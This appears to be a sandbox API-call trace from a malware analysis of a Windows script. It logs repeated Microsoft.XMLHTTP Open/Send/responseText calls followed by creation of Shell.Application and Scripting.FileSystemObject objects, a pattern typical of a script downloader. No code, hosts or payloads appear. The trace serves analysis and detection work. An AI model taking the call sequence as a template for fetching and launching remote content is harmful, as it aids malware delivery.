	[0474.243] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0474.244] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0474.244] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7488) returned 0x0
	[0474.244] ??2@YAPEAX_K@Z () returned 0x62f330
	[0474.244] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7488, pUnkSite=0x62f330) 
	[0474.244] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0474.244] XMLHTTPRequest:IUnknown:Release (This=0x49c7488) returned 0x0
	[0474.244] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0474.244] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0474.244] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0474.244] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0474.244] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0474.244] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0474.244] SysStringLen (param_1=0x0) returned 0x0
	[0474.244] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0474.244] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0474.244] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b90) returned 0x0
	[0474.244] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0474.244] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74d8) returned 0x0
	[0474.245] ??2@YAPEAX_K@Z () returned 0x62f310
	[0474.245] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74d8, pUnkSite=0x62f310) 
	[0474.245] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0474.245] XMLHTTPRequest:IUnknown:Release (This=0x49c74d8) returned 0x0
	[0474.245] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b90) returned 0x0
	[0474.245] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b90) returned 0x3
	[0474.245] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0474.245] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b90, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0474.245] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0474.245] longjmp () 
	[0474.245] longjmp () 
	[0474.245] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0474.245] SysStringLen (param_1=0x0) returned 0x0
	[0474.245] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0474.246] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0474.246] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c30) returned 0x0
	[0474.246] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0474.246] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7578) returned 0x0
	[0474.246] ??2@YAPEAX_K@Z () returned 0x62f330
	[0474.246] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7578, pUnkSite=0x62f330) 
	[0474.246] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0474.246] XMLHTTPRequest:IUnknown:Release (This=0x49c7578) returned 0x0
	[0474.246] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c30) returned 0x0
	[0474.246] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c30) returned 0x3
	[0474.246] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0474.246] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c30, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0474.246] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0474.246] longjmp () 
	[0474.246] longjmp () 
	[0474.247] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0474.247] SysStringLen (param_1=0x0) returned 0x0
	[0474.247] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0474.247] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0474.247] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0474.247] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0474.247] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0474.247] ??2@YAPEAX_K@Z () returned 0x62f310
	[0474.247] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f310) 
	[0474.247] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0474.247] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0474.247] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0474.247] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0474.247] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0474.247] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0474.247] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0474.247] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0474.248] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0474.248] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0476.835] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0476.836] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0476.836] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0476.836] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0476.836] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0476.836] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0476.836] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0476.836] SysStringLen (param_1=0x0) returned 0x0
	[0476.836] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0476.836] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0476.836] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0476.837] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0476.837] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0476.837] ??2@YAPEAX_K@Z () returned 0x62f350
	[0476.837] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0476.837] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0476.837] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0476.837] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0476.837] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0476.837] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0476.837] SysStringLen (param_1=0x0) returned 0x0
	[0476.837] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0476.840] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0476.840] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0476.840] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0476.840] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0476.840] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0476.841] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0478.023] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0478.023] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0478.024] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0478.025] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0478.025] SysStringLen (param_1=0x0) returned 0x0
	[0478.025] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
